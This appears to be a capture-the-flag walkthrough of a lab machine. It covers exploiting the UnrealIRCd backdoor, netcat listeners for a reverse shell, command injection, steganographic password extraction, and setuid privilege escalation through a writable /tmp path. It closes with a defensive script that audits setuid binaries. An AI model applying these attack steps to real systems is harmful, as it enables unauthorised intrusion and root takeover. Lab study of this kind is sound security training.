The /manual directory leads us to the default Apache HTTP Server documentation page:
http://10.10.10.117/manual/en/index.html
It identifies the server as Apache version 2.4.
Enumeration: UnrealIRCd Ports 6697, 8067 & 65534
Another dead end. Let’s move on to other ports. Ports 22 and 111, running OpenSSH 6.7p1 and rpcbind 2–4, don’t look promising. Ports 6697, 8067 & 65534 are running UnrealIRCd. A version of this service shipped with a backdoor that allowed command execution. Let’s see if there are any nmap scripts that check for this vulnerability.
Documentation tells us that not only can nmap detect it, but it can also be used to start a netcat listener that would give us a shell on the system. First, run an nmap scan to see which of these ports are vulnerable to the backdoor.
┌──(kali💀kali)-[~]
└─$ nmap -p 6697,8067,65534 --script irc-unrealircd-backdoor 10.10.10.117
6697/tcp open ircs-u
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
8067/tcp open infi-async
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).
65534/tcp open unknown
Port 8067 is vulnerable!
Shell as ircd
The next obvious step would be to get a reverse shell on the machine by exploiting the UnrealIRCd backdoor vulnerability. After attempting to do that, I spent an hour trying to figure out why neither my netcat reverse nor bind shells were working. It turns out that if you add the flag “-n”, which stands for “do not do any DNS or service lookups on any specified address”, the shell doesn’t work. I’m not sure why. I’ll update this blog when I figure it out.
OPTION 1:
For now, set up a listener on the attack machine.
┌──(kali💀kali)-[~]
└─$ nc -nlvp 4444
nc -lnvp 443
Send a reverse shell to our listener from the target machine.
This gives us a partially interactive bash shell. To get a fully interactive shell, background the session (Ctrl+Z) and run the following in your terminal. It puts your local terminal into raw mode with echo off, so control keys such as Ctrl+C are passed through to the remote shell instead of being handled locally.
stty raw -echo
Once that is done, run the command “fg” to bring netcat back to the foreground.
OPTION 2:
Based on what I found during reconnaissance, I think I can just connect with nc and enter AB; [some command] and get it to run. I’ll test with a ping. I have tcpdump running, listening for ICMP. Now I’ll connect and test out my theory:
We don’t. We need to escalate privileges. In that same directory, there’s a hidden .backup file:
ircd@irked:/home/djmardov/Documents$ ls -la
ircd@irked:/home/djmardov/Documents$ cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
Steg:
With the reference to steg, I immediately think of the big image on the website. I’ll download a copy:
┌──(kali💀kali)-[~/Desktop]
└─$ wget 10.10.10.117/irked.jpg
Now I’ll try steghide, a command-line steg tool, with the following arguments:
extract - I want to extract data
-sf irked.jpg - give the file to extract from
-p - passphrase
┌──(kali💀kali)-[~/Desktop]
└─$ steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".
┌──(kali💀kali)-[~/Desktop]
└─$ cat pass.txt
Kab6h+m+bbp2J:HG
SU:
That password works as djmardov’s password with su:
ircd@irked:~/Unreal3.2$ su djmardov
su djmardov
Password: Kab6h+m+bbp2J:HG
djmardov@irked:/home/ircd/Unreal3.2$
Let’s try executing the file to see what it outputs.
djmardov@irked:/tmp$ cd /usr/bin
djmardov@irked:/usr/bin$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2024-01-06 21:22 (:0)
It seems to be running a file, /tmp/listusers, which does not exist. Since the SUID bit is set on viewuser, it executes with the privileges of the file’s owner; that owner is root, so anything viewuser runs is executed as root. /tmp is writable by everyone, including us, so let’s create /tmp/listusers and have it run a shell.
djmardov@irked:/dev/shm$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2024-01-06 21:22 (:0)
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
djmardov@irked:/dev/shm$ echo sh > /tmp/listusers
djmardov@irked:/dev/shm$ viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2024-01-06 21:22 (:0)
# id
uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)
# python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
root@irked:/dev/shm#
root@irked:/dev/shm# cat /root/root.txt
cat /root/root.txt
a4da2------------------------------
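The root cause above, a setuid-root binary that executes a fixed path under /tmp where any local user can create a file, is something a defender can audit for directly. The following script is an added example and is not part of the original writeup: it walks the usual binary directories, picks out setuid-root executables, and reports any embedded strings that point into a world-writable directory. The WORLD_WRITABLE_DIRS list, the scanned roots and the SAMPLE_BINARY bytes are assumptions constructed for the example, not data from the box.

```python
import os
import stat

# Dirs any user can write to; a setuid program that runs a fixed path here is hijackable (viewuser via /tmp/listusers).
WORLD_WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed stand-in for a binary like viewuser (not the real file).
SAMPLE_BINARY = (b"\x7fELF\x02\x01\x01\x00This application is being devleoped"
                 b"\x00/tmp/listusers\x00/usr/bin/id\x00")


def printable_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Minimal re-implementation of `strings`: runs of printable ASCII."""
    out, run = [], bytearray()
    for b in data + b"\x00":  # trailing sentinel flushes the final run
        if 32 <= b < 127:
            run.append(b)
            continue
        if len(run) >= min_len:
            out.append(run.decode("ascii"))
        run = bytearray()
    return out


def writable_path_refs(strs) -> list[str]:
    """Keep only the strings that name a path inside a world-writable dir."""
    return [s for s in strs if any(d in s for d in WORLD_WRITABLE_DIRS)]


def audit_suid_binaries(roots=("/bin", "/sbin", "/usr/bin", "/usr/sbin")) -> dict:
    """Map each setuid-root binary under roots to the writable-path strings it contains."""
    findings = {}
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)  # lstat: never follow symlinks
                    if not (stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == 0):
                        continue
                    with open(path, "rb") as fh:
                        refs = writable_path_refs(printable_strings(fh.read()))
                except OSError:  # unreadable or vanished file: skip it
                    continue
                if refs:
                    findings[path] = refs
    return findings


if __name__ == "__main__":
    print("sample:", writable_path_refs(printable_strings(SAMPLE_BINARY)))
    for binary, refs in audit_suid_binaries().items():
        print(binary, "->", ", ".join(refs))
```

A string match is only a heuristic: a binary that builds the path at runtime or uses a relative path (the classic PATH hijack) will not show up, so treat a clean run as a starting point, not a clean bill of health.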